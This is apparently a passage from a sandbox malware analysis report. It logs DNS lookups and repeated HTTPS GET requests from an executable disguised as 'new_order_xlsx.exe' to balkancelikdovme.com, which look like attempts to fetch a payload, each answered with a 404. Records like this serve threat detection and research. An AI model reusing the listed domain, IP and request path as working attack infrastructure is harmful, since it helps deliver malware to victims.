                    Sep 4, 2023 16:38:18.911128044 CEST49735443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:18.911159992 CEST44349735185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:18.988639116 CEST44349735185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:18.988872051 CEST49735443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:18.991230011 CEST49735443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:18.991265059 CEST44349735185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:18.991676092 CEST44349735185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:18.994399071 CEST49735443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:19.035520077 CEST44349735185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:19.090713978 CEST44349735185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:19.090831995 CEST44349735185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:19.090960026 CEST49735443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:19.091309071 CEST49735443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:19.091341972 CEST44349735185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:19.091362000 CEST49735443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:19.091373920 CEST44349735185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:28.913181067 CEST49736443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:28.913249969 CEST44349736185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:28.913347960 CEST49736443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:28.914076090 CEST49736443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:28.914104939 CEST44349736185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:28.992522955 CEST44349736185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:28.992793083 CEST49736443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:28.995507002 CEST49736443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:28.995539904 CEST44349736185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:28.995965004 CEST44349736185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:28.998897076 CEST49736443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:29.043493032 CEST44349736185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:29.094928980 CEST44349736185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:29.095053911 CEST44349736185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:29.095664024 CEST49736443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:29.096513987 CEST49736443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:29.096560955 CEST44349736185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:29.096594095 CEST49736443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:29.096607924 CEST44349736185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:38.901184082 CEST49737443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:38.901232958 CEST44349737185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:38.901341915 CEST49737443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:38.902555943 CEST49737443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:38.902578115 CEST44349737185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:38.981415987 CEST44349737185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:38.981535912 CEST49737443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:38.983365059 CEST49737443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:38.983382940 CEST44349737185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:38.983933926 CEST44349737185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:38.986653090 CEST49737443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:39.027479887 CEST44349737185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:39.083014011 CEST44349737185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:39.083121061 CEST44349737185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:39.083251953 CEST49737443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:39.083800077 CEST49737443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:39.083800077 CEST49737443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:39.083827019 CEST44349737185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:39.083859921 CEST44349737185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:48.876991987 CEST49738443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:48.877083063 CEST44349738185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:48.877172947 CEST49738443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:48.877863884 CEST49738443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:48.877899885 CEST44349738185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:48.953335047 CEST44349738185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:48.953469038 CEST49738443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:48.955735922 CEST49738443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:48.955749989 CEST44349738185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:48.956059933 CEST44349738185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:48.958384037 CEST49738443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:49.003474951 CEST44349738185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:49.056870937 CEST44349738185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:49.056967020 CEST44349738185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:49.057101965 CEST49738443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:49.057332993 CEST49738443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:49.057370901 CEST44349738185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:49.057390928 CEST49738443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:49.057404041 CEST44349738185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:58.955584049 CEST49739443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:58.955657005 CEST44349739185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:58.955804110 CEST49739443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:58.959841013 CEST49739443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:58.959886074 CEST44349739185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:59.043687105 CEST44349739185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:59.043889046 CEST49739443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:59.080552101 CEST49739443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:59.080621958 CEST44349739185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:59.081142902 CEST44349739185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:59.120940924 CEST49739443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:59.282408953 CEST49739443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:59.316441059 CEST44349739185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:59.316577911 CEST44349739185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:59.316648006 CEST49739443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:59.317368984 CEST49739443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:59.317388058 CEST44349739185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:59.317404985 CEST49739443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:59.317413092 CEST44349739185.181.116.217192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 4, 2023 16:36:09.132842064 CEST | 192.168.2.4 | 8.8.8.8 | 0x7289 | Standard query (0) | balkancelikdovme.com | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:36:18.938189030 CEST | 192.168.2.4 | 8.8.8.8 | 0x591a | Standard query (0) | balkancelikdovme.com | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:36:28.902761936 CEST | 192.168.2.4 | 8.8.8.8 | 0x3332 | Standard query (0) | balkancelikdovme.com | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:36:38.878403902 CEST | 192.168.2.4 | 8.8.8.8 | 0xc500 | Standard query (0) | balkancelikdovme.com | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:36:49.034348011 CEST | 192.168.2.4 | 8.8.8.8 | 0xc38b | Standard query (0) | balkancelikdovme.com | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:36:58.886195898 CEST | 192.168.2.4 | 8.8.8.8 | 0xc3db | Standard query (0) | balkancelikdovme.com | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:37:08.939090014 CEST | 192.168.2.4 | 8.8.8.8 | 0x70ae | Standard query (0) | balkancelikdovme.com | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:37:18.895230055 CEST | 192.168.2.4 | 8.8.8.8 | 0x50f3 | Standard query (0) | balkancelikdovme.com | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:37:30.710581064 CEST | 192.168.2.4 | 8.8.8.8 | 0x15b9 | Standard query (0) | balkancelikdovme.com | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:37:38.892713070 CEST | 192.168.2.4 | 8.8.8.8 | 0xca3d | Standard query (0) | balkancelikdovme.com | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:37:49.732264042 CEST | 192.168.2.4 | 8.8.8.8 | 0x917a | Standard query (0) | balkancelikdovme.com | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:37:58.862595081 CEST | 192.168.2.4 | 8.8.8.8 | 0xebfb | Standard query (0) | balkancelikdovme.com | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:38:09.501190901 CEST | 192.168.2.4 | 8.8.8.8 | 0xe282 | Standard query (0) | balkancelikdovme.com | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:38:18.877739906 CEST | 192.168.2.4 | 8.8.8.8 | 0x5705 | Standard query (0) | balkancelikdovme.com | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:38:28.891261101 CEST | 192.168.2.4 | 8.8.8.8 | 0x95c6 | Standard query (0) | balkancelikdovme.com | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:38:38.870651007 CEST | 192.168.2.4 | 8.8.8.8 | 0x4561 | Standard query (0) | balkancelikdovme.com | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:38:48.845858097 CEST | 192.168.2.4 | 8.8.8.8 | 0xbc6a | Standard query (0) | balkancelikdovme.com | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:38:58.924144030 CEST | 192.168.2.4 | 8.8.8.8 | 0xfb7b | Standard query (0) | balkancelikdovme.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 4, 2023 16:36:09.147981882 CEST | 8.8.8.8 | 192.168.2.4 | 0x7289 | No error (0) | balkancelikdovme.com | | 185.181.116.217 | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:36:18.985531092 CEST | 8.8.8.8 | 192.168.2.4 | 0x591a | No error (0) | balkancelikdovme.com | | 185.181.116.217 | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:36:28.931853056 CEST | 8.8.8.8 | 192.168.2.4 | 0x3332 | No error (0) | balkancelikdovme.com | | 185.181.116.217 | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:36:38.917459011 CEST | 8.8.8.8 | 192.168.2.4 | 0xc500 | No error (0) | balkancelikdovme.com | | 185.181.116.217 | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:36:49.082881927 CEST | 8.8.8.8 | 192.168.2.4 | 0xc38b | No error (0) | balkancelikdovme.com | | 185.181.116.217 | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:36:58.915710926 CEST | 8.8.8.8 | 192.168.2.4 | 0xc3db | No error (0) | balkancelikdovme.com | | 185.181.116.217 | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:37:08.968136072 CEST | 8.8.8.8 | 192.168.2.4 | 0x70ae | No error (0) | balkancelikdovme.com | | 185.181.116.217 | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:37:18.942511082 CEST | 8.8.8.8 | 192.168.2.4 | 0x50f3 | No error (0) | balkancelikdovme.com | | 185.181.116.217 | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:37:30.731101990 CEST | 8.8.8.8 | 192.168.2.4 | 0x15b9 | No error (0) | balkancelikdovme.com | | 185.181.116.217 | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:37:38.916171074 CEST | 8.8.8.8 | 192.168.2.4 | 0xca3d | No error (0) | balkancelikdovme.com | | 185.181.116.217 | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:37:49.753021955 CEST | 8.8.8.8 | 192.168.2.4 | 0x917a | No error (0) | balkancelikdovme.com | | 185.181.116.217 | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:37:58.877693892 CEST | 8.8.8.8 | 192.168.2.4 | 0xebfb | No error (0) | balkancelikdovme.com | | 185.181.116.217 | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:38:09.548331976 CEST | 8.8.8.8 | 192.168.2.4 | 0xe282 | No error (0) | balkancelikdovme.com | | 185.181.116.217 | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:38:18.906862974 CEST | 8.8.8.8 | 192.168.2.4 | 0x5705 | No error (0) | balkancelikdovme.com | | 185.181.116.217 | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:38:28.911595106 CEST | 8.8.8.8 | 192.168.2.4 | 0x95c6 | No error (0) | balkancelikdovme.com | | 185.181.116.217 | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:38:38.899369001 CEST | 8.8.8.8 | 192.168.2.4 | 0x4561 | No error (0) | balkancelikdovme.com | | 185.181.116.217 | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:38:48.875427961 CEST | 8.8.8.8 | 192.168.2.4 | 0xbc6a | No error (0) | balkancelikdovme.com | | 185.181.116.217 | A (IP address) | IN (0x0001) | false
Sep 4, 2023 16:38:58.947972059 CEST | 8.8.8.8 | 192.168.2.4 | 0xfb7b | No error (0) | balkancelikdovme.com | | 185.181.116.217 | A (IP address) | IN (0x0001) | false
                    • balkancelikdovme.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49701 | 185.181.116.217 | 443 | C:\Users\user\Desktop\new_order_xlsx.exe

Timestamp | kBytes transferred | Direction | Data
2023-09-04 14:36:09 UTC | 0 | OUT | GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: balkancelikdovme.com
2023-09-04 14:36:09 UTC | 0 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 708
date: Mon, 04 Sep 2023 14:36:09 GMT
vary: User-Agent
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-09-04 14:36:09 UTC | 0 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
1           192.168.2.4  49706        185.181.116.217  443               C:\Users\user\Desktop\new_order_xlsx.exe

Timestamp: 2023-09-04 14:36:19 UTC  kBytes transferred: 1  Direction: OUT  Data:
GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: balkancelikdovme.com

Timestamp: 2023-09-04 14:36:19 UTC  kBytes transferred: 1  Direction: IN  Data:
HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 708
date: Mon, 04 Sep 2023 14:36:19 GMT
vary: User-Agent
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Timestamp: 2023-09-04 14:36:19 UTC  kBytes transferred: 1  Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
10          192.168.2.4  49732        185.181.116.217  443               C:\Users\user\Desktop\new_order_xlsx.exe

Timestamp: 2023-09-04 14:37:49 UTC  kBytes transferred: 12  Direction: OUT  Data:
GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: balkancelikdovme.com

Timestamp: 2023-09-04 14:37:49 UTC  kBytes transferred: 13  Direction: IN  Data:
HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 708
date: Mon, 04 Sep 2023 14:37:49 GMT
vary: User-Agent
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Timestamp: 2023-09-04 14:37:49 UTC  kBytes transferred: 13  Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
11          192.168.2.4  49733        185.181.116.217  443               C:\Users\user\Desktop\new_order_xlsx.exe

Timestamp: 2023-09-04 14:37:58 UTC  kBytes transferred: 14  Direction: OUT  Data:
GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: balkancelikdovme.com

Timestamp: 2023-09-04 14:37:59 UTC  kBytes transferred: 14  Direction: IN  Data:
HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 708
date: Mon, 04 Sep 2023 14:37:59 GMT
vary: User-Agent
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Timestamp: 2023-09-04 14:37:59 UTC  kBytes transferred: 14  Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
12          192.168.2.4  49734        185.181.116.217  443               C:\Users\user\Desktop\new_order_xlsx.exe

Timestamp: 2023-09-04 14:38:09 UTC  kBytes transferred: 15  Direction: OUT  Data:
GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: balkancelikdovme.com

Timestamp: 2023-09-04 14:38:09 UTC  kBytes transferred: 15  Direction: IN  Data:
HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 708
date: Mon, 04 Sep 2023 14:38:09 GMT
vary: User-Agent
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Timestamp: 2023-09-04 14:38:09 UTC  kBytes transferred: 16  Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
13          192.168.2.4  49735        185.181.116.217  443               C:\Users\user\Desktop\new_order_xlsx.exe

Timestamp: 2023-09-04 14:38:18 UTC  kBytes transferred: 16  Direction: OUT  Data:
GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: balkancelikdovme.com

Timestamp: 2023-09-04 14:38:19 UTC  kBytes transferred: 16  Direction: IN  Data:
HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 708
date: Mon, 04 Sep 2023 14:38:19 GMT
vary: User-Agent
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Timestamp: 2023-09-04 14:38:19 UTC  kBytes transferred: 17  Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
